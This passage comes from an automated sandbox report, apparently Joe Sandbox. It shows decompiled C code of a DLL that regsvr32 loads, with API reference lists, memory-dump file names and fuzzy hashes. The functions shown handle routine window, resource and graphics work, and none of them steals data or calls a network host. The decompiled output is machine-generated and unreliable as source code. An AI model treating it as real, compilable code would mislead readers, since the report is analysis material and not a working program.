					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E1001F77E(0xc);
									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E1001E118(_t93, __eflags);
									} else {
										_push(_v12);
										E1001DF55(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E10006D96( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}

0x100071cd
0x100071cf
0x100071d2
0x100071d5
0x100071dc
0x100071e8
0x100071f0
0x100071f4
0x100071fc
0x100071ff
0x00000000
0x10007201
0x1000720f
0x1000720f
0x100071f0
0x10007212
0x10007215
0x10007218
0x1000721b
0x10007222
0x1000722d
0x10007230
0x10007234
0x10007237
0x1000723c
0x1000723c
0x10007237
0x10007242
0x10007245
0x10007247
0x10007328
0x00000000
0x1000724d
0x1000724d
0x10007250
0x10007254
0x10007256
0x10007259
0x1000725c
0x1000726c
0x1000726c
0x1000726f
0x10007271
0x10007274
0x10007277
0x1000727d
0x1000727d
0x10007280
0x10007282
0x100072b8
0x100072b8
0x100072bb
0x100072be
0x100072c2
0x100072c5
0x100072ce
0x100072d0
0x100072d3
0x100072fa
0x100072fa
0x100072d5
0x100072de
0x100072e6
0x100072ec
0x100072f0
0x100072f3
0x100072f6
0x100072f6
0x100072ff
0x10007302
0x10007306
0x10007307
0x10007313
0x10007309
0x10007309
0x1000730c
0x1000730c
0x10007307
0x00000000
0x100072c5
0x10007284
0x10007287
0x1000728d
0x10007290
0x00000000
0x10007292
0x10007292
0x10007295
0x10007297
0x1000729a
0x100072b2
0x1000729c
0x100072ad
0x100072ad
0x1000729a
0x10007318
0x1000731b
0x1000731c
0x1000731f
0x1000731f
0x1000727d
0x00000000
0x10007277

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 100071E8
LoadResource.KERNEL32(?,00000000), ref: 100071F4
LockResource.KERNEL32(00000000), ref: 10007209
FreeResource.KERNEL32(00000000), ref: 1000723C
GetDlgItem.USER32 ref: 100072E6

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeItemLoadLock
String ID:
API String ID: 996205394-0
Opcode ID: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
Instruction ID: 3ddb78cc740fa9bd2d00af88598f625c67c34797d15b04e165b588e19e6e1fdb
Opcode Fuzzy Hash: a2403dcbaf47a98d0818dc6bf856e1e017887b1b7f9ace347811d0ac3dce61fc
Instruction Fuzzy Hash: 37516B35A00209EFEB14CFA5C884A9EBBF5FF44390F508469E80A9B255D734EA41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 10009B77 Relevance: 7.6, APIs: 5, Instructions: 126
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10009B77(void* __ebx, void* __ecx) {
				void* _t62;
				long _t63;
				void* _t76;

				E10011BF0(0x1003ae2b, _t76);
				_t62 =  *((intOrPtr*)(_t76 + 0xc)) + 0x2cc;
				if(_t62 > 0xf) {
					L20:
					_t63 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t62 + 0x10009d63) & 0x000000ff) * 4 +  &M10009D3B))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L19;
						case 1:
							_t65 =  *((intOrPtr*)(_t76 + 0x10));
							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
							 *_t65 = 0xb;
							goto L19;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							E1000A369( *(__ebp + 8)) =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L19;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							 *__eax = 0xb;
							goto L19;
						case 4:
							__eax = E100243B2();
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)( *__eax + 0xc))();
							 *(__ebp + 0xc) = __eax;
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E10006A60(__ebp + 0xc, 0xf1c0);
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
							__ecx =  *(__ebp + 0xc);
							 *(__esi + 8) = __eax;
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							__eflags = __ecx;
							goto L18;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							 *(__esi + 8) = GetThreadLocale();
							goto L19;
						case 6:
							__eflags =  *(__esi + 0x58) - 0xffffffff;
							if( *(__esi + 0x58) == 0xffffffff) {
								_push( *(__esi + 0x1c));
								__ecx = __ebp - 0x20;
								E10029194(__ebp - 0x20) =  *(__esi + 0x1c);
								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x5c) = __eax;
								__eax = E100291EF(__ebp - 0x20, __eflags);
							}
							__eflags = __edi - 0xfffffd43;
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x5c);
							} else {
								__esi =  *(__esi + 0x58);
							}
							 *(__eax + 8) = __esi;
							goto L19;
						case 7:
							__eflags =  *(__esi + 0x60);
							if( *(__esi + 0x60) != 0) {
								L13:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x60);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *(__esi + 0x60);
								 *(__edi + 8) =  *(__esi + 0x60);
								goto L19;
							} else {
								__ecx =  *(__esi + 0x1c);
								__eax = E100090C8( *(__esi + 0x1c));
								__ecx = __esi;
								__eax = E1000943B(__esi, __eax);
								__eflags =  *(__esi + 0x60);
								if( *(__esi + 0x60) == 0) {
									goto L20;
								} else {
									goto L13;
								}
							}
							goto L21;
						case 8:
							__eax = E100243B2();
							__edx =  *__eax;
							__ecx = __eax;
							_t43 = __eax + 0x10; // 0x10
							__esi = _t43;
							 *(__ebp + 0xc) = __esi;
							__edi =  *(__ebp + 0x10);
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx = __ebp + 0xc;
							 *__edi = 8;
							 *(__edi + 8) = E10035C0F(__ebx, __ebp + 0xc, __edi, __esi, __ebp);
							_t50 = __esi - 0x10; // 0x0
							__ecx = _t50;
							L18:
							__eax = E100014B0(__ecx, __edx);
							L19:
							_t63 = 1;
							goto L21;
						case 9:
							goto L20;
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t63;
			}

0x10009b7c
0x10009b89
0x10009b94
0x10009d29
0x10009d29
0x10009b9a
0x10009ba1
0x00000000
0x10009bcc
0x10009bcf
0x10009bd4
0x00000000
0x00000000
0x10009ba8
0x10009bab
0x10009bb0
0x00000000
0x00000000
0x10009c82
0x10009c85
0x10009c88
0x10009c92
0x10009c94
0x10009c96
0x00000000
0x00000000
0x10009bba
0x10009bbd
0x10009bc2
0x00000000
0x00000000
0x10009ce0
0x10009ce5
0x10009ce7
0x10009ce9
0x10009cef
0x10009cf7
0x10009cfa
0x10009d01
0x10009d06
0x10009d09
0x10009d0c
0x10009d11
0x10009d16
0x10009d19
0x10009d1c
0x10009d1c
0x00000000
0x00000000
0x10009c9f
0x10009ca2
0x10009cad
0x00000000
0x00000000
0x10009bdf
0x10009be3
0x10009be5
0x10009be8
0x10009bf0
0x10009c00
0x10009c12
0x10009c15
0x10009c1b
0x10009c1e
0x10009c21
0x10009c21
0x10009c26
0x10009c2c
0x10009c2f
0x10009c34
0x10009c3b
0x10009c36
0x10009c36
0x10009c36
0x10009c3e
0x00000000
0x00000000
0x10009c46
0x10009c4a
0x10009c66
0x10009c66
0x10009c69
0x10009c6e
0x10009c71
0x10009c73
0x10009c77
0x10009c7a
0x00000000
0x10009c4c
0x10009c4c
0x10009c4f
0x10009c55
0x10009c57
0x10009c5c
0x10009c60
0x00000000
0x00000000
0x00000000
0x00000000
0x10009c60
0x00000000
0x00000000
0x10009cb2
0x10009cb7
0x10009cb9
0x10009cbe
0x10009cbe
0x10009cc1
0x10009cc4
0x10009cc7
0x10009ccb
0x10009cce
0x10009cd8
0x10009cdb
0x10009cdb
0x10009d1f
0x10009d1f
0x10009d24
0x10009d26
0x00000000
0x00000000
0x00000000
0x00000000
0x10009ba1
0x10009d2b
0x10009d30
0x10009d38

APIs

__EH_prolog.LIBCMT ref: 10009B7C
SendMessageA.USER32 ref: 10009C00
GetBkColor.GDI32(?), ref: 10009C09
GetTextColor.GDI32(?), ref: 10009C15
GetThreadLocale.KERNEL32(0000F1C0), ref: 10009CA7

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$H_prologLocaleMessageSendTextThread
String ID:
API String ID: 741590120-0
Opcode ID: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
Instruction ID: 17d43df59e13e7a0fc638ef54e749073bd167348119b36b57266e85b12fc2c17
Opcode Fuzzy Hash: ffd68efac94681e02b946185b7585b592d7a198cf77f0b1454b8da5265c6291b
Instruction Fuzzy Hash: D451543590074ADFEB20DF64C88499EB7F0FF08354F21895AE8569B3A1E774A981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100344F5 Relevance: 7.6, APIs: 5, Instructions: 99
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100344F5(void* __ecx, intOrPtr _a8) {
				signed int _v7;
				intOrPtr _v8;
				struct tagRECT _v24;
				void* _t44;
				void* _t48;
				void* _t52;
				void* _t57;
				void* _t64;
				signed int _t67;
				void* _t75;
				void* _t76;
				signed int _t78;

				_t75 = __ecx;
				_v8 = E100202AB(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v24);
				_t67 = GetSystemMetrics(0x21);
				_t78 = GetSystemMetrics(0x20);
				_t76 = E1002204B(_t75);
				if((_v7 & 0x00000010) == 0) {
					L5:
					if(_t76 < 0xa || _t76 > 0x11) {
						if(_t76 != 4) {
							goto L16;
						}
						goto L8;
					} else {
						L8:
						if((_v7 & 0x00000008) == 0) {
							InflateRect( &_v24,  ~_t78,  ~_t67);
							if((_v7 & 0x00000002) == 0) {
								L16:
								return _t76;
							}
							_t44 = _t76 - 4;
							if(_t44 == 0) {
								L21:
								return 0xb + (0 | _a8 - _v24.bottom > 0x00000000) * 4;
							}
							_t48 = _t44 - 9;
							if(_t48 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + (0 | _a8 - _v24.top < 0x00000000) + 0xa;
							}
							_t52 = _t48 - 1;
							if(_t52 == 0) {
								return (0 | _a8 - _v24.top < 0x00000000) + 0xb;
							}
							_t57 = _t52;
							if(_t57 == 0) {
								return ((0 | _a8 - _v24.bottom <= 0x00000000) - 0x00000001 & 0x00000005) + 0xa;
							}
							if(_t57 == 1) {
								goto L21;
							}
							goto L16;
						}
						_t64 = 2;
						return _t64;
					}
				}
				if(_t76 == 3) {
					_t76 = 2;
				}
				if(GetKeyState(2) >= 0) {
					goto L5;
				} else {
					return 0;
				}
			}

0x100344fe
0x10034505
0x1003450f
0x10034521
0x10034527
0x10034532
0x10034534
0x1003454f
0x10034552
0x1003455c
0x00000000
0x00000000
0x00000000
0x1003455e
0x1003455e
0x10034562
0x10034573
0x1003457d
0x10034595
0x00000000
0x10034595
0x10034581
0x10034584
0x100345d3
0x00000000
0x100345de
0x10034586
0x10034589
0x00000000
0x100345cd
0x1003458b
0x1003458c
0x00000000
0x100345bd
0x1003458f
0x10034590
0x00000000
0x100345ad
0x10034593
0x00000000
0x00000000
0x00000000
0x10034593
0x10034566
0x00000000
0x10034566
0x10034552
0x10034539
0x1003453d
0x1003453d
0x10034549
0x00000000
0x1003454b
0x00000000
0x1003454b

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

GetWindowRect.USER32 ref: 1003450F
GetSystemMetrics.USER32 ref: 1003451D
GetSystemMetrics.USER32 ref: 10034523
GetKeyState.USER32 ref: 10034540
InflateRect.USER32(?,00000000,00000000), ref: 10034573

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsRectSystemWindow$InflateLongState
String ID:
API String ID: 2406722796-0
Opcode ID: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
Instruction ID: eebfe8686990ea06ae8873f0c24ea56f3203d68343432915ce32c001f6d4e862
Opcode Fuzzy Hash: ca75ff146dd13cf3a9a81e35c2b644f3561e541cec42ef1ad0753529e650aa81
Instruction Fuzzy Hash: 2A31D63AE0051DEFDB12DBA8C888EAE7BA5EF49291F464416D802DF193CE34F940C650

Uniqueness

Uniqueness Score: -1.00%

Function 10022C99 Relevance: 7.6, APIs: 5, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10022C99(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;
				void* _t69;

				_t69 = __eflags;
				E10011BF0(0x1003a5dc, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E1001FFB4(_t64 - 0x38);
				E10021613(_t64 - 0x88, _t69);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x6c) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x88;
						if(E10022115() == 0 || E1001FE3C(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E1001FE3C( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x6c), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E100202AB(_t64 - 0x88) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E1001FFDA(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x6c) = 0;
				_t31 = E10022977(_t64 - 0x88);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}

0x10022c99
0x10022c9e
0x10022cad
0x10022cb0
0x10022cbb
0x10022cc5
0x10022cce
0x10022cd2
0x10022cd9
0x10022cda
0x10022ce6
0x10022cef
0x10022cf0
0x10022cfa
0x10022d26
0x10022d28
0x10022d2d
0x10022d42
0x10022d66
0x10022d66
0x10022d44
0x10022d4f
0x10022d55
0x00000000
0x00000000
0x10022d55
0x10022d42
0x10022d6f
0x10022d6f
0x10022d26
0x10022d7d
0x10022d7f
0x10022d87
0x10022d88
0x10022d92
0x10022d95
0x10022d9f
0x10022da7

APIs

__EH_prolog.LIBCMT ref: 10022C9E
GetTopWindow.USER32(?), ref: 10022CC8
GetDlgCtrlID.USER32 ref: 10022CDD
SendMessageA.USER32 ref: 10022D39
GetWindow.USER32(00000000,00000002), ref: 10022D77

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$CtrlH_prologMessageSend
String ID:
API String ID: 4125289812-0
Opcode ID: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100316E6 Relevance: 7.6, APIs: 5, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100316E6(void* __ecx, unsigned int _a4) {
				struct HWND__* _t20;
				void* _t23;
				void* _t33;
				void* _t34;
				struct HWND__* _t35;

				_t34 = __ecx;
				if((E100202AB(__ecx) & 0x40000000) == 0) {
					_t33 = E10022AD5(__ecx);
				} else {
					_t33 = __ecx;
				}
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E100203CE(_t33);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
					} else {
						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
					}
				}
				_t20 = GetWindow(GetDesktopWindow(), 5);
				while(1) {
					_t35 = _t20;
					if(_t35 == 0) {
						break;
					}
					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
						SendMessageA(_t35, 0x36d, _a4, 0);
					}
					_t20 = GetWindow(_t35, 2);
				}
				return _t20;
			}

0x100316ea
0x100316f6
0x10031703
0x100316f8
0x100316f8
0x100316f8
0x10031710
0x10031714
0x10031725
0x10031753
0x1003172f
0x1003172f
0x1003173f
0x10031741
0x10031741
0x10031725
0x10031784
0x10031784
0x10031786
0x1003178a
0x00000000
0x00000000
0x10031771
0x1003177f
0x1003177f
0x10031784
0x10031784
0x10031790

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

SendMessageA.USER32 ref: 1003173F
SendMessageA.USER32 ref: 10031753
GetDesktopWindow.USER32 ref: 10031757
SendMessageA.USER32 ref: 1003177F
GetWindow.USER32(00000000), ref: 10031784

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395

Uniqueness

Uniqueness Score: -1.00%

Function 10031E6F Relevance: 7.6, APIs: 5, Instructions: 62
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _t20;
				int _t24;
				unsigned int _t45;
				intOrPtr _t52;

				_t20 =  *0x1004c470; // 0xf256d946
				_v8 = _t20;
				_v272 = __ecx;
				_t52 =  *((intOrPtr*)(E100373B5() + 4));
				if(_t52 != 0 && _a8 != 0) {
					_t45 = _a8 >> 0x10;
					if(_t45 != 0) {
						_t24 =  *(_t52 + 0x8c);
						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							GlobalGetAtomNameA(0,  &_v268, 0x103);
							GlobalAddAtomA( &_v268);
							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
						}
					}
				}
				return E100117AE(0, _v8);
			}

0x10031e78
0x10031e7e
0x10031e81
0x10031e8c
0x10031e91
0x10031ea5
0x10031eab
0x10031eb1
0x10031ebc
0x10031edc
0x10031eeb
0x10031f03
0x10031f0c
0x10031f33
0x10031f3a
0x10031ebc
0x10031eab
0x10031f47

APIs

GlobalGetAtomNameA.KERNEL32 ref: 10031EDC
GlobalAddAtomA.KERNEL32 ref: 10031EEB
GlobalGetAtomNameA.KERNEL32 ref: 10031F03
GlobalAddAtomA.KERNEL32 ref: 10031F0C
SendMessageA.USER32 ref: 10031F33

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AtomGlobal$Name$MessageSend
String ID:
API String ID: 1515195355-0
Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60

Uniqueness

Uniqueness Score: -1.00%

Function 10033E13 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10033E13(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x1004efa8; // 0x60
					_t12 =  *0x1004efac; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10028F83(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x10033e16
0x10033e19
0x10033e1e
0x10033e6a
0x10033e70
0x00000000
0x10033e20
0x10033e29
0x10033e2e
0x10033e64
0x10033e66
0x10033e75
0x10033e75
0x10033e87
0x10033e8f
0x10033e95
0x10033e97
0x10033e35
0x10033e37
0x10033e3b
0x10033e43
0x10033e4a
0x10033e4d
0x10033e4d
0x10033e2e
0x10033e9e

APIs

GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,746B8B90), ref: 10033E23
GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66

Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0

MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
MulDiv.KERNEL32(00000000,000009EC,746B8B90), ref: 10033E95

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
